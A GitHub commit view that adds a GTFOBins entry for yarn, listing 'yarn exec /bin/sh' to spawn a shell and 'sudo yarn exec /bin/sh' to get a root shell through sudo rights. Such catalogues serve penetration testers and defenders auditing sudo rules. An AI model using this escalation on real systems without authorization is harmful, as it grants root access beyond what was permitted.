This commit is contained in:
b33lz3bub
2021-06-18 17:36:46 +05:30
committed by GitHub
parent cfe0a0c300
commit 1405b4dce5

7
_gtfobins/yarn.md Normal file
View File

@@ -0,0 +1,7 @@
---
functions:
shell:
- code: yarn exec /bin/sh
sudo:
- code: sudo yarn exec /bin/sh
---